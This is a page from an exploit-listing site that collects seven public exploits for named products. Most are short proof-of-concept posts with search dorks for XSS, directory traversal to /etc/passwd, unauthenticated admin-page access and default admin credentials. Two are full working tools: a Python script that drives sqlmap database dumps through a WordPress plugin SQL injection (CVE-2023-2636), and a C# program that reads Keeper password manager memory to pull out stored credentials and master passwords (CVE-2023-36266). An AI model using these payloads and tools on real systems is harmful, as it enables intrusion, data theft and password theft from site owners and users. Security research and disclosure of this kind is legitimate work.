Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : CMSninesol v1.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.ninesol.com | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E [+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : CMSdosma v5.0 Unauthorized Administrative Access Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) | | # Vendor : http://dosmacommunications.co.za/home/ | | # Dork : intext:www.feliciabuthelezi.co.za. All rights Reserved | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Allows full control of the website [+] Use payload : /admin/addreview.php?p=insertreview [+] http://127.0.0.1/feliciabuthelezicoza/admin/addreview.php?p=insertreview Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>#!/usr/bin/python3 # Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi # Date: 2023-07-26 # Exploit Author: Lukas Kinneberg # Github: https://github.com/lukinneberg/CVE-2023-2636 # Vendor Homepage: https://wordpress.org/plugins/an-gradebook/ # Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z # Tested on: WordPress 6.2.2 # CVE: CVE-2023-2636 from datetime import datetime import os import requests import json # User Input: target_ip = 'CHANGE_THIS' target_port = '80' username = 'hacker' password = 'hacker' banner = ''' ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Exploit Author: Lukas Kinneberg ''' print(banner) print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') print('[*] Payload for SQL-Injection:') # Enter the URL path of the course after the target_port below exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" ' exploitcode_risk = '--level 2 --risk 2 ' exploitcode_cookie = '--cookie="' + cookie + '" ' # SQLMAP Printout print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) </code></pre>

<pre><code>==================================================================================================================================== | # Title : CMSJerusalem Weather Forecast v1.3 Directory Traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit) | | # Vendor : https://www.behance.net/user/?username=galizorea | | # Dork : Designed by Gali Zorea | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /small.php?section=../../../../../../../../../etc/passwd [+] http://target_site/small.php?section=../../../../../../../../../etc/passwd Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Yourdoctor CMS v1.4 Unauthorised Administrative Access Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/item/yourdoctor-medical-and-doctor-website-cms/20811493 | | # Dork : "Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex." | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Unauthorized administrator access. Allows any visitor to Download subscriber list. [+] use payload : /admin/subscriber-csv.php [+] http://127.0.0.1/admin/subscriber-csv.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code># Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping # Google Dork: NA # Date: 22-07-2023 # Exploit Author: H4rk3nz0 # Vendor Homepage: https://www.keepersecurity.com/en_GB/ # Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html # Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4 # Tested on: Windows # CVE : CVE-2023-36266 using System; using System.Management; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; using System.Collections.Generic; // Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory // This can persist after logout if the user has not explicitly enabled the option to 'clear process memory' // As a result of this one can extract credentials & master password from a victim after achieving low priv access // This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app. // Github: https://github.com/H4rk3nz0/Peeper static class Program { // To make sure we are targetting the right child process - check command line public static string GetCommandLine(this Process process) { if (process is null || process.Id < 1) { return ""; } string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}"; using (var searcher = new ManagementObjectSearcher(query)) using (var collection = searcher.Get()) { var managementObject = collection.OfType<ManagementObject>().FirstOrDefault(); return managementObject != null ? (string)managementObject["CommandLine"] : ""; } } //Extract plain text credential JSON strings (regex inelegant but fast) public static void extract_credentials(string text) { int index = text.IndexOf("{\"title\":\""); int eindex = text.IndexOf("}"); while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))"); string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); int match_cut = match.IndexOf("} "); if (match_cut != -1 ) { match = match.Substring(0, match_cut + "} ".Length).TrimEnd(); if (!stringsList.Contains(match) && match.Length > 20) { Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n"); stringsList.Add(match); } } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20) { Console.WriteLine("->Credential Record Found : " + match + "\n"); stringsList.Add(match.TrimEnd()); } index = text.IndexOf("{\"title\":\"", index + 1); eindex = text.IndexOf("}", eindex + 1); } catch { return; } } } // extract account/email containing JSON string public static void extract_account(string text) { int index = text.IndexOf("{\"expiry\""); int eindex = text.IndexOf("}"); while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)"); string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); if ((match.Length > 2)) { Console.WriteLine("->Account Record Found : " + match + "\n"); return; } index = text.IndexOf("{\"expiry\"", index + 1); eindex = text.IndexOf("}", eindex + 1); } catch { return; } } } // Master password not available with SSO based logins but worth looking for. // Disregard other data key entries that seem to match: _not_master_key_example public static void extract_master(string text) { int index = text.IndexOf("data_key"); int eindex = index + 64; while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(data_key[ -~]+)"); var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})"); if (match_one.Replace("data_key", "").Length > 5) { if (!clean.IsMatch(match_one.Replace("data_key", ""))) { Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n"); } } index = text.IndexOf("data_key", index + 1); eindex = index + 64; } catch { return; } } } // Store extracted strings and comapre public static List<string> stringsList = new List<string>(); // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8 // Performs OpenProcess to get handle with necessary query permissions static void Main(string[] args) { foreach (var process in Process.GetProcessesByName("keeperpasswordmanager")) { string commandline = GetCommandLine(process); if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7")) { Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString()); Console.WriteLine("->Searching...\n"); IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id); IntPtr address = new IntPtr(0x10000000000); MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION(); while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0) { if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000) { byte[] buffer = new byte[(int)memInfo.RegionSize]; if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0) { string text = Encoding.ASCII.GetString(buffer); extract_credentials(text); extract_master(text); extract_account(text); } } address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64()); } CloseHandle(processHandle); } } } [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject); [DllImport("ntdll.dll")] public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead); [DllImport("kernel32.dll", SetLastError = true)] public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength); [StructLayout(LayoutKind.Sequential)] public struct MEMORY_BASIC_INFORMATION { public IntPtr BaseAddress; public IntPtr AllocationBase; public uint AllocationProtect; public IntPtr RegionSize; public uint State; public uint Protect; public uint Type; } } </code></pre>

<pre><code>====================================================================================================================================== | # Title : Buzzy - News Viral Lists Polls and Videos V 2.5.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4 | | # Dork : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved." | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] appears to leave default credentials installed after installation. [+] Use Admin : admin@admin.com & Pass : admin [+] http://wwclickhungamacom/ Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>